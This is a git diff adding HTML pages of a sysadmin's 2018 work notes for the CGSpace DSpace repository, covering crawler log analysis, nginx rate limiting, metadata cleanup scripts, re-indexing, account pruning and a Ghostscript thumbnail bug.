+$ curl -X GET -H "Content-Type: application/json" -H "Accept: application/json" -H "rest-dspace-token: e09fb5e1-72b0-4811-a2e5-5c1cd78293cc" https://dspacetest.cgiar.org/rest/status
+{"okay":true,"authenticated":false,"email":null,"fullname":null,"token":null}%
+
    +
  • Improve the documentation of my dspace-statistics-api
  • +
  • Email Modi and Jayashree from ICRISAT to ask if they want to join CGSpace as partners
  • +
+

2018-10-24

+
    +
  • I deployed the new Creative Commons choices to the usage rights on the CGSpace submission form
  • +
  • Also, I deployed the changes to show usage rights on the item view
  • +
  • Re-work the dspace-statistics-api to use Python’s native json instead of ujson to make it easier to deploy in places where we don’t have — or don’t want to have — Python headers and a compiler (like containers)
  • +
  • Re-work the deployment of the API to use systemd’s EnvironmentFile to read the environment variables instead of Environment in the RMG Ansible infrastructure scripts
  • +
+
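  • The idea is to keep the variables in one file that systemd reads at start instead of a pile of Environment= directives in the unit; a minimal sketch, with a hypothetical path and example variable name:

# /etc/systemd/system/dspace-statistics-api.service.d/override.conf (hypothetical)
[Service]
EnvironmentFile=/opt/dspace-statistics-api/environment
# where the environment file contains plain KEY=value lines, for example:
#   DATABASE_NAME=dspacestatistics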

2018-10-25

+
    +
  • Send Peter and Jane a list of technical ToRs for AReS open source work:
  • +
  • Basic version of AReS that works with metadata fields present in default DSpace 5.x/6.x (for example author, date issued, type, subjects) +
      +
    • Ability to harvest multiple repositories
    • +
    • Configurable list of extra fields to harvest, per repository
    • +
    • Configurable list of field and value mappings for consistent display/search with multiple repositories
    • +
    • Configurable list of graphs/blocks to display on homepage
    • +
    • Optional harvesting of DSpace view/download statistics if dspace-statistics-api is available on repository
    • +
    • Optional harvesting of Altmetric mentions
    • +
    • Configurable scheduling of harvesting (daily, weekly, etc)
    • +
    • High-quality README.md on GitHub with description, requirements, deployment instructions, and license (GPLv3 unless ICARDA has a problem with that)
    • +
    +
  • +
  • Maria asked if we can add publisher (dc.publisher) to the advanced search filters, so I created a GitHub issue to track it
  • +
+

2018-10-28

+
    +
  • I forked the SolrClient library and updated its kazoo dependency to be version 2.5.0 so we stop getting errors about “async” being a reserved keyword in Python 3.7
  • +
  • Then I re-generated the requirements.txt in the dspace-statistics-api and released version 0.5.2
  • +
  • Then I re-deployed the API on DSpace Test, ran all system updates on the server, and rebooted it
  • +
  • I tested my hack of depositing to one collection where the default item and bitstream READ policies are restricted and then mapping the item to another collection, but the item retains its default policies so Anonymous cannot see them in the mapped collection either
  • +
  • Perhaps we need to try moving the item and inheriting the target collection’s policies?
  • +
  • I merged the changes for adding publisher (dc.publisher) to the advanced search to the 5_x-prod branch (#402)
  • +
  • I merged the changes for adding versionless Creative Commons licenses to the submission form to the 5_x-prod branch (#403)
  • +
  • I will deploy them later this week
  • +
+

2018-10-29

+
    +
  • I deployed the publisher and Creative Commons changes to CGSpace, ran all system updates, and rebooted the server
  • +
  • I sent the email to Jane Poole and ILRI ICT and Finance to start the admin process of getting a new Linode server for AReS
  • +
+

2018-10-30

+
    +
  • Meet with the COPO guys to walk them through the CGSpace submission workflow and discuss CG core, REST API, etc +
      +
    • I suggested that they look into submitting via the SWORDv2 protocol because it respects the workflows
    • +
    • They said that they’re not too worried about the hierarchical CG core schema, that they would just flatten metadata like affiliations when depositing to a DSpace repository
    • +
    • I said that it might be time to engage the DSpace community to add support for more advanced schemas in DSpace 7+ (perhaps partnership with Atmire?)
    • +
    +
  • +
+

2018-10-31

+
    +
  • More discussion and planning for AReS open sourcing and Amman meeting in 2019-10
  • +
  • I did some work to clean up and improve the dspace-statistics-api README.md and project structure and moved it to the ILRI organization on GitHub
  • +
  • Now the API serves some basic documentation on the root route
  • +
  • I want to announce it to the dspace-tech mailing list soon
  • +
diff --git a/docs/2018-11/index.html b/docs/2018-11/index.html new file mode 100644 index 000000000..32f663734 --- /dev/null +++ b/docs/2018-11/index.html @@ -0,0 +1,607 @@

November, 2018 | CGSpace Notes

November, 2018
+

2018-11-01

+
    +
  • Finalize AReS Phase I and Phase II ToRs
  • +
  • Send a note about my dspace-statistics-api to the dspace-tech mailing list
  • +
+

2018-11-03

+
    +
  • Linode has been sending mails a few times a day recently that CGSpace (linode18) has had high CPU usage
  • +
  • Today these are the top 10 IPs:
  • +
+
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "03/Nov/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+   1300 66.249.64.63
+   1384 35.237.175.180
+   1430 138.201.52.218
+   1455 207.46.13.156
+   1500 40.77.167.175
+   1979 50.116.102.77
+   2790 66.249.64.61
+   3367 84.38.130.177
+   4537 70.32.83.92
+  22508 66.249.64.59
+
    +
  • The 66.249.64.x are definitely Google
  • +
  • 70.32.83.92 is well known, probably CCAFS or something, as it’s only a few thousand requests and always to the REST API
  • +
  • 84.38.130.177 is some new IP in Latvia that is only hitting the XMLUI, using the following user agent:
  • +
+
Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.792.0 Safari/535.1
+
    +
  • They at least seem to be re-using their Tomcat sessions:
  • +
+
$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=84.38.130.177' dspace.log.2018-11-03
+342
+
    +
  • 50.116.102.77 is also a regular REST API user
  • +
  • 40.77.167.175 and 207.46.13.156 seem to be Bing
  • +
  • 138.201.52.218 seems to be on Hetzner in Germany, but is using this user agent:
  • +
+
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:62.0) Gecko/20100101 Firefox/62.0
+
    +
  • And it doesn’t seem they are re-using their Tomcat sessions:
  • +
+
$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=138.201.52.218' dspace.log.2018-11-03
+1243
+
    +
  • Ah, we’ve apparently seen this server exactly a year ago in 2017-11, making 40,000 requests in one day…
  • +
  • I wonder if it’s worth adding them to the list of bots in the nginx config?
  • +
  • Linode sent a mail that CGSpace (linode18) is using high outgoing bandwidth
  • +
  • Looking at the nginx logs again I see the following top ten IPs:
  • +
+
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "03/Nov/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+   1979 50.116.102.77
+   1980 35.237.175.180
+   2186 207.46.13.156
+   2208 40.77.167.175
+   2843 66.249.64.63
+   4220 84.38.130.177
+   4537 70.32.83.92
+   5593 66.249.64.61
+  12557 78.46.89.18
+  32152 66.249.64.59
+
    +
  • 78.46.89.18 is new since I last checked a few hours ago, and it’s from Hetzner with the following user agent:
  • +
+
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:62.0) Gecko/20100101 Firefox/62.0
+
    +
  • It’s making lots of requests, though actually it does seem to be re-using its Tomcat sessions:
  • +
+
$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18' dspace.log.2018-11-03
+8449
+$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18' dspace.log.2018-11-03 | sort | uniq | wc -l
+1
+
    +
  • Updated on 2018-12-04 to correct the grep command above, as it was inaccurate and it seems the bot was actually already re-using its Tomcat sessions
  • +
  • I could add this IP to the list of bot IPs in nginx, but it seems like a futile effort when some new IP could come along and do the same thing
  • +
  • Perhaps I should think about adding rate limits to dynamic pages like /discover and /browse
  • +
  • I think it’s reasonable for a human to click one of those links five or ten times a minute…
  • +
  • To contrast, 78.46.89.18 made about 300 requests per minute for a few hours today:
  • +
+
# grep 78.46.89.18 /var/log/nginx/access.log | grep -o -E '03/Nov/2018:[0-9][0-9]:[0-9][0-9]' | sort | uniq -c | sort -n | tail -n 20
+    286 03/Nov/2018:18:02
+    287 03/Nov/2018:18:21
+    289 03/Nov/2018:18:23
+    291 03/Nov/2018:18:27
+    293 03/Nov/2018:18:34
+    300 03/Nov/2018:17:58
+    300 03/Nov/2018:18:22
+    300 03/Nov/2018:18:32
+    304 03/Nov/2018:18:12
+    305 03/Nov/2018:18:13
+    305 03/Nov/2018:18:24
+    312 03/Nov/2018:18:39
+    322 03/Nov/2018:18:17
+    326 03/Nov/2018:18:38
+    327 03/Nov/2018:18:16
+    330 03/Nov/2018:17:57
+    332 03/Nov/2018:18:19
+    336 03/Nov/2018:17:56
+    340 03/Nov/2018:18:14
+    341 03/Nov/2018:18:18
+
    +
  • If they want to download all our metadata and PDFs they should use an API rather than scraping the XMLUI
  • +
  • I will add them to the list of bot IPs in nginx for now and think about enforcing rate limits in XMLUI later
  • +
  • Also, this is the third (?) time a mysterious IP on Hetzner has done this… who is this?
  • +
+

2018-11-04

+
    +
  • Forward Peter’s information about CGSpace financials to Modi from ICRISAT
  • +
  • Linode emailed about the CPU load and outgoing bandwidth on CGSpace (linode18) again
  • +
  • Here are the top ten IPs active so far this morning:
  • +
+
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "04/Nov/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+   1083 2a03:2880:11ff:2::face:b00c
+   1105 2a03:2880:11ff:d::face:b00c
+   1111 2a03:2880:11ff:f::face:b00c
+   1134 84.38.130.177
+   1893 50.116.102.77
+   2040 66.249.64.63
+   4210 66.249.64.61
+   4534 70.32.83.92
+  13036 78.46.89.18
+  20407 66.249.64.59
+
    +
  • 78.46.89.18 is back… and it is still actually re-using its Tomcat sessions:
  • +
+
$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18' dspace.log.2018-11-04
+8765
+$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18' dspace.log.2018-11-04 | sort | uniq | wc -l
+1
+
    +
  • Updated on 2018-12-04 to correct the grep command and point out that the bot was actually re-using its Tomcat sessions properly
  • +
  • Also, now we have a ton of Facebook crawlers:
  • +
+
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "04/Nov/2018" | grep "2a03:2880:11ff:" | awk '{print $1}' | sort | uniq -c | sort -n
+    905 2a03:2880:11ff:b::face:b00c
+    955 2a03:2880:11ff:5::face:b00c
+    965 2a03:2880:11ff:e::face:b00c
+    984 2a03:2880:11ff:8::face:b00c
+    993 2a03:2880:11ff:3::face:b00c
+    994 2a03:2880:11ff:7::face:b00c
+   1006 2a03:2880:11ff:10::face:b00c
+   1011 2a03:2880:11ff:4::face:b00c
+   1023 2a03:2880:11ff:6::face:b00c
+   1026 2a03:2880:11ff:9::face:b00c
+   1039 2a03:2880:11ff:1::face:b00c
+   1043 2a03:2880:11ff:c::face:b00c
+   1070 2a03:2880:11ff::face:b00c
+   1075 2a03:2880:11ff:a::face:b00c
+   1093 2a03:2880:11ff:2::face:b00c
+   1107 2a03:2880:11ff:d::face:b00c
+   1116 2a03:2880:11ff:f::face:b00c
+
    +
  • They are really making shit tons of requests:
  • +
+
$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff' dspace.log.2018-11-04
+37721
+
    +
  • Updated on 2018-12-04 to correct the grep command to accurately show the number of requests
  • +
  • Their user agent is:
  • +
+
facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)
+
    +
  • I will add it to the Tomcat Crawler Session Manager valve
  • +
  • Later in the evening… ok, this Facebook bot is getting super annoying:
  • +
+
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "04/Nov/2018" | grep "2a03:2880:11ff:" | awk '{print $1}' | sort | uniq -c | sort -n
+   1871 2a03:2880:11ff:3::face:b00c
+   1885 2a03:2880:11ff:b::face:b00c
+   1941 2a03:2880:11ff:8::face:b00c
+   1942 2a03:2880:11ff:e::face:b00c
+   1987 2a03:2880:11ff:1::face:b00c
+   2023 2a03:2880:11ff:2::face:b00c
+   2027 2a03:2880:11ff:4::face:b00c
+   2032 2a03:2880:11ff:9::face:b00c
+   2034 2a03:2880:11ff:10::face:b00c
+   2050 2a03:2880:11ff:5::face:b00c
+   2061 2a03:2880:11ff:c::face:b00c
+   2076 2a03:2880:11ff:6::face:b00c
+   2093 2a03:2880:11ff:7::face:b00c
+   2107 2a03:2880:11ff::face:b00c
+   2118 2a03:2880:11ff:d::face:b00c
+   2164 2a03:2880:11ff:a::face:b00c
+   2178 2a03:2880:11ff:f::face:b00c
+
    +
  • Now at least the Tomcat Crawler Session Manager Valve seems to be forcing it to re-use some Tomcat sessions:
  • +
+
$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff' dspace.log.2018-11-04
+37721
+$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff' dspace.log.2018-11-04 | sort | uniq | wc -l
+15206
+
    +
  • I think we still need to limit more of the dynamic pages, like the “most popular” country, item, and author pages
  • +
  • It seems these are popular too, and there is no fucking way Facebook needs that information, yet they are requesting thousands of them!
  • +
+
# grep 'face:b00c' /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -c 'most-popular/'
+7033
+
    +
  • I added the “most-popular” pages to the list that return X-Robots-Tag: none to try to inform bots not to index or follow those pages
  • +
  • Also, I implemented an nginx rate limit of twelve requests per minute on all dynamic pages… I figure a human user might legitimately request one every five seconds
  • +
+
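  • Roughly, those two nginx changes look like this; the zone name, zone size, burst value, and the exact location pattern are placeholders rather than the exact config we deployed, and lumping both directives into one location block is a simplification:

# in the http block: allow an average of twelve requests per minute per client IP
limit_req_zone $binary_remote_addr zone=dynamicpages:16m rate=12r/m;

# in the server block: rate limit dynamic pages and discourage indexing of "most popular" pages
location ~ /(discover|browse|most-popular) {
    limit_req zone=dynamicpages burst=5;
    add_header X-Robots-Tag "none";
    try_files $uri @tomcat;
}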

2018-11-05

+
    +
  • I wrote a small Python script add-dc-rights.py to add usage rights (dc.rights) to CGSpace items based on the CSV Hector gave me from MARLO:
  • +
+
$ ./add-dc-rights.py -i /tmp/marlo.csv -db dspace -u dspace -p 'fuuu'
+
    +
  • The file marlo.csv was cleaned up and formatted in Open Refine
  • +
  • 165 of the items in their 2017 data are from CGSpace!
  • +
  • I will add the data to CGSpace this week (done!)
  • +
  • Jesus, is Facebook trying to be annoying? At least the Tomcat Crawler Session Manager Valve is working to force the bot to re-use its Tomcat sessions:
  • +
+
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "05/Nov/2018" | grep -c "2a03:2880:11ff:"
+29889
+# grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff' dspace.log.2018-11-05
+29763
+# grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff' dspace.log.2018-11-05 | sort | uniq | wc -l
+1057
+# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "05/Nov/2018" | grep "2a03:2880:11ff:" | grep -c -E "(handle|bitstream)"
+29896
+
    +
  • 29,000 requests from Facebook and none of the requests are to the dynamic pages I rate limited yesterday!
  • +
  • At least the Tomcat Crawler Session Manager Valve is working now…
  • +
+

2018-11-06

+
    +
  • I updated all the DSpace helper Python scripts to validate against PEP 8 using Flake8
  • +
  • While I was updating the rest-find-collections.py script I noticed it was using expand=all to get the collection and community IDs
  • +
  • I realized I actually only need expand=collections,subCommunities, and I wanted to see how much overhead the extra expands created so I did three runs of each:
  • +
+
$ time ./rest-find-collections.py 10568/27629 --rest-url https://dspacetest.cgiar.org/rest
+
    +
  • Average time with all expands was 14.3 seconds, and 12.8 seconds with collections,subCommunities, so 1.5 seconds difference!
  • +
+

2018-11-07

+
    +
  • Update my dspace-statistics-api to use a database management class with Python contexts so that connections and cursors are automatically opened and closed
  • +
  • Tag version 0.7.0 of the dspace-statistics-api
  • +
+

2018-11-08

+ +

2018-11-11

+
    +
  • I added tests to the dspace-statistics-api!
  • +
  • It runs with Python 3.5, 3.6, and 3.7 using pytest, including automatically on Travis CI!
  • +
+
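  • The Travis CI side of that is just a small build matrix; a sketch of the idea (the install step is an assumption):

# .travis.yml
language: python
python:
  - "3.5"
  - "3.6"
  - "3.7"
install:
  - pip install -r requirements.txt
script:
  - pytest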

2018-11-13

+
    +
  • Help troubleshoot an issue with Judy Kimani submitting to the ILRI project reports, papers and documents collection on CGSpace
  • +
  • For some reason there is an existing group for the “Accept/Reject” workflow step, but it’s empty
  • +
  • I added Judy to the group and told her to try again
  • +
  • Sisay changed his leave to be full days until December so I need to finish the IITA records that he was working on (IITA_ ALIZZY1802-csv_oct23)
  • +
  • Sisay had said there were a few PDFs missing and Bosede sent them this week, so I had to find those items on DSpace Test and add the bitstreams to the items manually
  • +
  • As for the collection mappings I think I need to export the CSV from DSpace Test, add mappings for each type (ie Books go to IITA books collection, etc), then re-import to DSpace Test, then export from DSpace command line in “migrate” mode…
  • +
  • From there I should be able to script the removal of the old DSpace Test collection so they just go to the correct IITA collections on import into CGSpace
  • +
+

2018-11-14

+
    +
  • Finally import the 277 IITA (ALIZZY1802) records to CGSpace
  • +
  • I had to export them from DSpace Test and import them into a temporary collection on CGSpace first, then export the collection as CSV to map them to new owning collections (IITA books, IITA posters, etc) with OpenRefine because DSpace’s dspace export command doesn’t include the collections for the items! (the CSV mapping step is sketched after this list)
  • +
  • Delete all old IITA collections on DSpace Test and run dspace cleanup to get rid of all the bitstreams
  • +
+
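  • The CSV mapping step looks roughly like this, with a placeholder handle, placeholder file names, and a hypothetical eperson email:

$ dspace metadata-export -i 10568/12345 -f /tmp/iita-temp-collection.csv
$ # edit the "collection" column in OpenRefine so each row points at the correct IITA collection
$ dspace metadata-import -f /tmp/iita-temp-collection-mapped.csv -e user@cgiar.org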

2018-11-15

+ +

2018-11-18

+
    +
  • Request invoice from Wild Jordan for their meeting venue in January
  • +
+

2018-11-19

+
    +
  • Testing corrections and deletions for AGROVOC (dc.subject) that Sisay and Peter were working on earlier this month:
  • +
+
$ ./fix-metadata-values.py -i 2018-11-19-correct-agrovoc.csv -f dc.subject -t correct -m 57 -db dspace -u dspace -p 'fuu' -d
+$ ./delete-metadata-values.py -i 2018-11-19-delete-agrovoc.csv -f dc.subject -m 57 -db dspace -u dspace -p 'fuu' -d
+
    +
  • Then I ran them on both CGSpace and DSpace Test, and started a full Discovery re-index on CGSpace:
  • +
+
$ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
+
    +
  • Generate a new list of the top 1500 AGROVOC subjects on CGSpace to send to Peter and Sisay:
  • +
+
dspace=# \COPY (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE metadata_field_id = 57 AND resource_type_id = 2 GROUP BY text_value ORDER BY count DESC LIMIT 1500) to /tmp/2018-11-19-top-1500-subject.csv WITH CSV HEADER;
+

2018-11-20

+
    +
  • The Discovery re-indexing on CGSpace never finished yesterday… the command died after six minutes
  • +
  • The dspace.log.2018-11-19 shows this at the time:
  • +
+
2018-11-19 15:23:04,221 ERROR com.atmire.dspace.discovery.AtmireSolrService @ DSpace kernel cannot be null
+java.lang.IllegalStateException: DSpace kernel cannot be null
+        at org.dspace.utils.DSpace.getServiceManager(DSpace.java:63)
+        at org.dspace.utils.DSpace.getSingletonService(DSpace.java:87)
+        at com.atmire.dspace.discovery.AtmireSolrService.buildDocument(AtmireSolrService.java:102)
+        at com.atmire.dspace.discovery.AtmireSolrService.indexContent(AtmireSolrService.java:815)
+        at com.atmire.dspace.discovery.AtmireSolrService.updateIndex(AtmireSolrService.java:884)
+        at org.dspace.discovery.SolrServiceImpl.createIndex(SolrServiceImpl.java:370)
+        at org.dspace.discovery.IndexClient.main(IndexClient.java:117)
+        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+        at java.lang.reflect.Method.invoke(Method.java:498)
+        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:226)
+        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:78)
+2018-11-19 15:23:04,223 INFO  com.atmire.dspace.discovery.AtmireSolrService @ Processing (4629 of 76007): 72731
+
    +
  • I looked in the Solr log around that time and I don’t see anything…
  • +
  • Working on Udana’s WLE records from last month, first the sixteen records in 2018-11-20 RDL Temp +
      +
    • these items will go to the Restoring Degraded Landscapes collection
    • +
    • a few items missing DOIs, but they are easily available on the publication page
    • +
    • clean up DOIs to use “https://doi.org” format
    • +
    • clean up some cg.identifier.url to remove unnecessary query strings
    • +
    • remove columns with no metadata (river basin, place, target audience, isbn, uri, publisher, ispartofseries, subject)
    • +
    • fix column with invalid spaces in metadata field name (cg. subject. wle)
    • +
    • trim and collapse whitespace in all fields
    • +
    • remove some weird Unicode characters (0xfffd) from abstracts, citations, and titles using Open Refine: value.replace('�','')
    • +
    • add dc.rights to some fields that I noticed while checking DOIs
    • +
    +
  • +
  • Then the 24 records in 2018-11-20 VRC Temp +
      +
    • these items will go to the Variability, Risks and Competing Uses collection
    • +
    • trim and collapse whitespace in all fields (lots in WLE subject!)
    • +
    • clean up some cg.identifier.url fields that had unnecessary anchors in their links
    • +
    • clean up DOIs to use “https://doi.org” format
    • +
    • fix column with invalid spaces in metadata field name (cg. subject. wle)
    • +
    • remove columns with no metadata (place, target audience, isbn, uri, publisher, ispartofseries, subject)
    • +
    • remove some weird Unicode characters (0xfffd) from abstracts, citations, and titles using Open Refine: value.replace('�','')
    • +
    • I notice a few items using DOIs pointing at ICARDA’s DSpace like: https://doi.org/20.500.11766/8178, which then points at the “real” DOI on the publisher’s site… these should be using the real DOI instead of ICARDA’s “fake” Handle DOI
    • +
    • Some items missing DOIs, but they clearly have them if you look at the publisher’s site
    • +
    +
  • +
+

2018-11-22

+
    +
  • Tezira is having problems submitting to the ILRI brochures collection for some reason +
      +
    • Judy Kimani was having issues resuming submissions in another ILRI collection recently, and the issue there was due to an empty group defined for the “accept/reject” step (aka workflow step 1)
    • +
    • The error then was “authorization denied for workflow step 1” where “workflow step 1” was the “accept/reject” step, which had a group defined, but was empty
    • +
    • Adding her to this group solved her issues
    • +
    • Tezira says she’s also getting the same “authorization denied” error for workflow step 1 when resuming submissions, so I told Abenet to delete the empty group
    • +
    +
  • +
+

2018-11-26

+
    +
  • This WLE item is issued on 2018-10 and accessioned on 2018-10-22 but does not show up in the WLE R4D Learning Series collection on CGSpace for some reason, and therefore does not show up on the WLE publication website
  • +
  • I tried to remove that collection from Discovery and do a simple re-index:
  • +
+
$ dspace index-discovery -r 10568/41888
+$ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery
+
    +
  • … but the item still doesn’t appear in the collection
  • +
  • Now I will try a full Discovery re-index:
  • +
+
$ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
+
    +
  • Ah, Marianne had set the item as private when she uploaded it, so it was still private
  • +
  • I made it public and now it shows up in the collection list
  • +
  • More work on the AReS terms of reference for CodeObia
  • +
  • Erica from AgriKnowledge emailed me to say that they have implemented the changes in their item page UI so that they include the permanent identifier on items harvested from CGSpace, for example: https://www.agriknowledge.org/concern/generics/wd375w33s
  • +
+

2018-11-27

+
    +
  • Linode alerted me that the outbound traffic rate on CGSpace (linode19) was very high
  • +
  • The top users this morning are:
  • +
+
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "27/Nov/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+    229 46.101.86.248
+    261 66.249.64.61
+    447 66.249.64.59
+    541 207.46.13.77
+    548 40.77.167.97
+    564 35.237.175.180
+    595 40.77.167.135
+    611 157.55.39.91
+   4564 205.186.128.185
+   4564 70.32.83.92
+
    +
  • We know 70.32.83.92 is the CCAFS harvester on MediaTemple, but 205.186.128.185 appears to be a new CCAFS harvester
  • +
  • I think we might want to prune some old accounts from CGSpace, perhaps users who haven’t logged in in the last two years would be a conservative bunch:
  • +
+
$ dspace dsrun org.dspace.eperson.Groomer -a -b 11/27/2016 | wc -l
+409
+$ dspace dsrun org.dspace.eperson.Groomer -a -b 11/27/2016 -d
+
    +
  • This deleted about 380 users, skipping those who have submissions in the repository
  • +
  • Judy Kimani was having problems taking tasks in the ILRI project reports, papers and documents collection again +
      +
    • The workflow step 1 (accept/reject) is now undefined for some reason
    • +
    • Last week the group was defined, but empty, so we added her to the group and she was able to take the tasks
    • +
    • Since then it looks like the group was deleted, so now she didn’t have permission to take or leave the tasks in her pool
    • +
    • We added her back to the group, then she was able to take the tasks, and then we removed the group again, as we generally don’t use this step in CGSpace
    • +
    +
  • +
  • Help Marianne troubleshoot an issue with items in their WLE collections and the WLE publications website
  • +
+

2018-11-28

+
    +
  • Change the usage rights text a bit based on Maria Garruccio’s feedback on “all rights reserved” (#404)
  • +
  • Run all system updates on DSpace Test (linode19) and reboot the server
  • +
diff --git a/docs/2018-12/index.html b/docs/2018-12/index.html new file mode 100644 index 000000000..732345182 --- /dev/null +++ b/docs/2018-12/index.html @@ -0,0 +1,648 @@

December, 2018 | CGSpace Notes

December, 2018
+

2018-12-01

+
    +
  • Switch CGSpace (linode18) to use OpenJDK instead of Oracle JDK
  • +
  • I manually installed OpenJDK, then removed Oracle JDK, then re-ran the Ansible playbook to update all configuration files, etc
  • +
  • Then I ran all system updates and restarted the server
  • +
+

2018-12-02

+ +
    +
  • The error when I try to manually run the media filter for one item from the command line:
  • +
+
org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: FailedToExecuteCommand `"gs" -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=pngalpha" -dTextAlphaBits=4 -dGraphicsAlphaBits=4 "-r72x72" -dFirstPage=1 -dLastPage=1 "-sOutputFile=/tmp/magick-12989PcFN0DnJOej7%d" "-f/tmp/magick-129895Bmp44lvUfxo" "-f/tmp/magick-12989C0QFG51fktLF"' (-1) @ error/delegate.c/ExternalDelegateCommand/461.
+org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: FailedToExecuteCommand `"gs" -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=pngalpha" -dTextAlphaBits=4 -dGraphicsAlphaBits=4 "-r72x72" -dFirstPage=1 -dLastPage=1 "-sOutputFile=/tmp/magick-12989PcFN0DnJOej7%d" "-f/tmp/magick-129895Bmp44lvUfxo" "-f/tmp/magick-12989C0QFG51fktLF"' (-1) @ error/delegate.c/ExternalDelegateCommand/461.
+        at org.im4java.core.Info.getBaseInfo(Info.java:360)
+        at org.im4java.core.Info.<init>(Info.java:151)
+        at org.dspace.app.mediafilter.ImageMagickThumbnailFilter.getImageFile(ImageMagickThumbnailFilter.java:142)
+        at org.dspace.app.mediafilter.ImageMagickPdfThumbnailFilter.getDestinationStream(ImageMagickPdfThumbnailFilter.java:24)
+        at org.dspace.app.mediafilter.FormatFilter.processBitstream(FormatFilter.java:170)
+        at org.dspace.app.mediafilter.MediaFilterManager.filterBitstream(MediaFilterManager.java:475)
+        at org.dspace.app.mediafilter.MediaFilterManager.filterItem(MediaFilterManager.java:429)
+        at org.dspace.app.mediafilter.MediaFilterManager.applyFiltersItem(MediaFilterManager.java:401)
+        at org.dspace.app.mediafilter.MediaFilterManager.main(MediaFilterManager.java:237)
+        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+        at java.lang.reflect.Method.invoke(Method.java:498)
+        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:226)
+        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:78)
+
    +
  • A comment on the StackOverflow question from yesterday suggests it might be a bug with the pngalpha device in Ghostscript and links to an upstream bug
  • +
  • I think we need to wait for a fix from Ubuntu
  • +
  • For what it’s worth, I get the same error on my local Arch Linux environment with Ghostscript 9.26:
  • +
+
$ gs -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 -sDEVICE=pngalpha -dTextAlphaBits=4 -dGraphicsAlphaBits=4 -r72x72 -dFirstPage=1 -dLastPage=1 -sOutputFile=/tmp/out%d -f/home/aorth/Desktop/Food\ safety\ Kenya\ fruits.pdf
+DEBUG: FC_WEIGHT didn't match
+zsh: segmentation fault (core dumped)  gs -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000
+
    +
  • When I replace the pngalpha device with png16m as suggested in the StackOverflow comments it works:
  • +
+
$ gs -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 -sDEVICE=png16m -dTextAlphaBits=4 -dGraphicsAlphaBits=4 -r72x72 -dFirstPage=1 -dLastPage=1 -sOutputFile=/tmp/out%d -f/home/aorth/Desktop/Food\ safety\ Kenya\ fruits.pdf
+DEBUG: FC_WEIGHT didn't match
+
    +
  • Start proofing the latest round of 226 IITA archive records that Bosede sent last week and Sisay uploaded to DSpace Test this weekend (IITA_Dec_1_1997 aka Daniel1807) +
      +
    • One item missing the authorship type
    • +
    • Some invalid countries (smart quotes, misspellings)
    • +
    • Added countries to some items that mentioned research in particular countries in their abstracts
    • +
    • One item had “MADAGASCAR” for ISI Journal
    • +
    • Minor corrections in IITA subject (LIVELIHOOD→LIVELIHOODS)
    • +
    • Trim whitespace in abstract field
    • +
    • Fix some sponsors (though some with “Governments of Canada” etc I’m not sure why those are plural)
    • +
